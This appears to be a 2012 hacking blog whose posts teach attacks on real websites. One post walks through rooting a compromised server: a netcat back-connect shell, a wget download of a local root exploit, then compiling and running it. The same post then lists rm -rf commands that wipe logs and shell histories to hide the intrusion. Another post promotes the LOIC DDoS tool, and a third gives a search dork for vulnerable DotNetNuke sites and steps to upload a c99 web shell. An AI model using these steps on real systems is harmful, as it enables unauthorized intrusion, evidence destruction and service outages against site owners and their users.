Tuesday, September 18, 2012

Website Server Root Hack Full Tutorial


Hi guys today i will tell you how to root a server in few easy steps .


Frndzzzzzzzz..! Now i show you that server root hack full tutorial in just some easy step. try it :)


Things Required :




  • NetcaT
  • Shelled site
  • Local root expl0it 

Step By Step Tutorial :
  • First go to Run & type cmd then type : cd C:\Program Files\Netcat  ( Make sure that you Netcat is saved in the following directory ) .




  • Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .

  • Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .

  • So you have successfully connected ..  Then now we have to get our Local Root Exploit, like mine is  2.6.18-374 2011 . 

  • In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder . 
Type this command to change dir to /tmp : cd /tmp
  • To upload your your exploit we will use wget function . 
Type : wget http://www.somesite.com/exploit.c 

Now this will upload the exploit in the tmp folder . 



  •  (Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit

Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. 

(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip 

  • After we have done all the above steps correctly, its time to give permission so we will type the following  command 
Type: chmod 777 exploit
  • Now  its time to run the Exploit, to run the exploit we will type the following command 
Type: ./exploit

Now the exploit will run & the server will be rooted  ;) .  To check weather we got root we can type 

Type: id or whoami  




Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

enjoy your hacking guyz... 
Posted by at No comments:

website hacking with dos method

Denial of Service

Denial of Service (DoS) is an attack technique with the intent of preventing a web site from serving normal user activity. DoS attacks, which are easily normally applied to the network layer, are also possible at the application layer. These malicious attacks can succeed by starving a system of critical resources, vulnerability exploit, or abuse of functionality.

Many times DoS attacks will attempt to consume all of a web site's available system resources such as: CPU, memory, disk space etc. When any one of these critical resources reach full utilization, the web site will normally be inaccessible.
As today's web application environments include a web server, database server and an authentication server, DoS at the application layer may target each of these independent components. Unlike DoS at the network layer, where a large number of connection attempts are required, DoS at the application layer is a much simpler task to perform.

Example
Assume a Health-Care web site that generates a report with medical history. For each report request, the web site queries the database to fetch all records matching a single social security number. Given that hundred of thousands of records are stored in the database (for all users), the user will need to wait three minutes to get their medical history report. During the three minutes of time, the database server's CPU reaches 60% utilization while searching for matching records.

A common application layer DoS attack will send 10 simultaneous requests asking to generate a medical history report. These requests will most likely put the web site under a DoS-condition as the database server's CPU will reach 100% utilization. At this point the system will likely be inaccessible to normal user activity.

DoS targeting a specific user
An intruder will repeatedly attempt to login to a web site as some user, purposely doing so with an invalid password. This process will eventually lock out the user.

DoS targeting the Database server
An intruder will use SQL injection techniques to modify the database so that the system becomes unusable (e.g., deleting all data, deleting all usernames etc.)

DoS targeting the Web server
An intruder will use Buffer Overflow techniques to send a specially crafted request that will crashes the web server process and the system will normally be inaccessible to normal user activity.

Here is the one of most populer ddos tools


 LOIC (for direct website attack with ddos method)
   Release Date: Unknown time
   Download Link :   Click Here

 if you don't have netframework download it
 LOIC video tutorial 
 (if u dont know how to use it)
 http://www.youtube.com/watch?v=sQRu-J3f_Kw            power by filemela :)

Posted by at No comments:

website hacking tutorial DNN



Hello frndzzzz, One more hacking method called "Portal Hacking (DNN)". This is a much easy trick for website hack :)


This method also uses google search to find hackable sites.. Now you can imagine that how much google.com is important for Hackers also...

Lets start the tutorials...

Step 2:Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx



this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3: 
you will find many sites, Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:
http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx
Step 5: Now replace/Home/tabid/36/Language/en-US/Default.aspx
with this/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6:You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8:Now replace the URL in the address bar with a Simple Scriptjavascript:__doPostBack('ctlURL$cmdUpload','')Step 9:You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 etc etc 

hope everybody success this and no need to search admin :)
                 
Labels:


Posted by at No comments:

Joomla 2.5 template


Game News Portal Joomla 2.5 template Check out one of the best Joomla game template out there! 

https://www.gavick.com/

Present news and other with free Joomla modules:
News Show Pro GK4, Tabs GK5 and K2.

Posted by at No comments:
Subscribe to: Posts (Atom)